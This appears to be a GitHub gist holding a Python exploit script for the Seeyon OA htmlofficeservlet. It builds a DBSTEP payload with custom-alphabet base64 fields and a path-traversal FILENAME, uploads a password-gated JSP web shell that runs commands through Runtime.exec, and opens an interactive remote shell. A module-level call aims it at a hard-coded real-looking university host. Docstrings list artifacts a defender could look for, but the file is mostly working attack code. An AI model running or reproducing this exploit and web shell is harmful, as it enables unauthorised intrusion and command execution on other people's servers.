@WangYihang
Created September 19, 2020 12:56
import sys
import base64
import requests
import string
STANDARD_ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
CUSTOM_ALPHABET = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'


def encode(data):
    """Base64-encode *data* (str, UTF-8) and remap the result through CUSTOM_ALPHABET.

    Every character of the standard base64 output is replaced one-for-one by
    the character at the same index in CUSTOM_ALPHABET, so the result cannot
    be read by a stock base64 decoder — only decode() reverses it. The two
    alphabets must stay the same length (65 characters, padding included).
    """
    to_custom = str.maketrans(STANDARD_ALPHABET, CUSTOM_ALPHABET)
    standard_b64 = base64.b64encode(data.encode("utf-8")).decode("utf-8")
    return standard_b64.translate(to_custom)


def decode(data):
    """Inverse of encode(): map CUSTOM_ALPHABET back to standard base64 and decode to str."""
    to_standard = str.maketrans(CUSTOM_ALPHABET, STANDARD_ALPHABET)
    raw = base64.b64decode(data.translate(to_standard))
    return raw.decode("utf-8")
def md5(data):
    """Return the lowercase hex MD5 digest of *data* encoded as UTF-8.

    Used in this script only as a checksum appended to the upload body.
    MD5 is not collision-resistant; it is a format requirement here, not an
    integrity guarantee.
    """
    import hashlib

    digest = hashlib.md5(data.encode("utf-8"))
    return digest.hexdigest()
def random_string(length=0x10, charset=string.ascii_letters + string.digits):
    """Return *length* characters picked independently at random from *charset*.

    Defaults to 16 alphanumeric characters. Draws from the ``random`` module,
    which is not a cryptographically secure generator.
    """
    import random

    picks = (random.choice(charset) for _ in range(length))
    return "".join(picks)
def system(url, password, command):
    """Send one command to the uploaded JSP and return the response body as text.

    The JSP written by exploit() executes the ``cmd`` query parameter only when
    ``pwd`` matches the password chosen at upload time. The URL is formatted
    with both parameters for the printout, and the same two values are passed
    again through ``params=``, so they appear in the request query string twice.
    """
    url = "{}?pwd={}&cmd={}".format(url, password, command)
    print("Shell: {}".format(url))
    # verify=False: TLS certificate validation is disabled for https targets.
    return requests.get(url, params={"pwd": password, "cmd": command}, verify=False).text
def shell(url, password):
    """Interactive loop: read a line from stdin, send it via system(), print the reply.

    Typing ``exit`` ends the loop; any other input (stripped of surrounding
    whitespace) is forwarded verbatim as the ``cmd`` parameter.
    """
    while True:
        command = input(">>> ").strip()
        if command == "exit":
            break
        print(system(url, password, command))
def exploit(protocol, host, port, os):
    """Upload a JSP web shell through ``/seeyon/htmlofficeservlet`` and enter shell().

    Args:
        protocol: "http" or "https".
        host, port: the Seeyon OA instance to contact.
        os: "windows" or "linux" — selects the path-separator style of the
            traversal path; any other value prints a message and returns.

    Artifacts a defender can look for, all visible in this function:
      * a POST to ``/seeyon/htmlofficeservlet`` whose body starts with the
        literal ``DBSTEP V3.0`` and carries the fixed MSIE 6.0 User-Agent;
      * a ``FILENAME`` field holding a ``../../../ApacheJetspeed/webapps/seeyon/``
        (or backslash) traversal path ending in a random 16-character ``.jsp``;
      * follow-up GETs to ``/seeyon/<name>.jsp`` with ``pwd`` and ``cmd`` query
        parameters.
    """
    url = "{}://{}:{}/seeyon/htmlofficeservlet".format(protocol, host, port)
    print("Attacking: {}".format(url))
    # Static headers; the dated MSIE 6.0 User-Agent string is a constant
    # fingerprint of this script.
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
        'Pragma': 'no-cache',
    }
    # Random 16-character alphanumeric name for the dropped JSP.
    filename = "{}.jsp".format(random_string(0x10))
    print("Using filename: {}".format(filename))
    # Relative path with three parent-directory steps into
    # ApacheJetspeed/webapps/seeyon; presumably resolved by the servlet
    # against its own working directory — only the separator differs per OS.
    if os == "windows":
        path = '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(filename)
    elif os == "linux":
        path = '../../../ApacheJetspeed/webapps/seeyon/{}'.format(filename)
    else:
        print("Unsupported OS: {}".format(os))
        return
    # DBSTEP key/value fields. FILENAME carries the traversal path; the other
    # values are fixed constants of the script ('originalCreateDate' is listed
    # twice, with different values).
    options = [
        ('DBSTEP','DBSTEP'),
        ('OPTION','SAVEASIMG'),
        ('currentUserId','6993007969600000271'),
        ('CREATEDATE','2019-05-20'),
        ('RECORDID','-5505256504423462237'),
        ('originalFileId','1'),
        ('originalCreateDate','2019-05-20'),
        ('FILENAME', path),
        ('needReadFile','false'),
        ('originalCreateDate','1558275164836'),
    ]
    # Each value is passed through encode() (custom-alphabet base64); the
    # key=value lines are CRLF-terminated.
    FMsgText = "\r\n".join(["{}={}".format(i[0], encode(i[1])) for i in options]) + "\r\n"
    FError = ""
    # Per-run password that gates the dropped shell (compared against ?pwd=).
    password = random_string(0x10)
    print("Using password: {}".format(password))
    # JSP source: runs request.getParameter("cmd") via Runtime.exec() when
    # "pwd" equals the password above, otherwise prints ":-)". The password is
    # spliced into the source as a string literal.
    FMsgFile = '<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("' + password + '".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println(excuteCmd(request.getParameter("cmd")));}else{out.println(":-)");}%>'
    # Hex MD5 of the JSP source; appended after the file body in the payload.
    FMsgFileMd5 = md5(FMsgFile)
    # 64-byte header: four 16-character, space-padded fields — the
    # "DBSTEP V3.0" magic, then the lengths of FMsgText, FError and FMsgFile.
    FHeader = "".join([
        "DBSTEP V3.0".ljust(16, " "),
        "{}".format(len(FMsgText)).ljust(16, " "),
        "{}".format(len(FError)).ljust(16, " "),
        "{}".format(len(FMsgFile)).ljust(16, " "),
    ])
    assert len(FHeader) == 64
    # Body layout: header | text fields | JSP source | MD5 of the JSP source.
    payload = "{}{}{}{}".format(FHeader, FMsgText, FMsgFile, FMsgFileMd5)
    # verify=False: TLS certificate validation is disabled for https targets.
    response = requests.post(url, data=payload, headers=headers, verify=False)
    # The status code is printed but not checked; the shell loop starts
    # regardless of whether the upload succeeded.
    print(response.status_code)
    shell("{}://{}:{}/seeyon/{}".format(protocol, host, port, filename), password)
    return
# Module-level call: the script runs against these hard-coded arguments as
# soon as it is executed or imported (no __main__ guard, no argv parsing).
exploit(protocol="http", host="oa.yangtzeu.edu.cn", port=80, os="linux")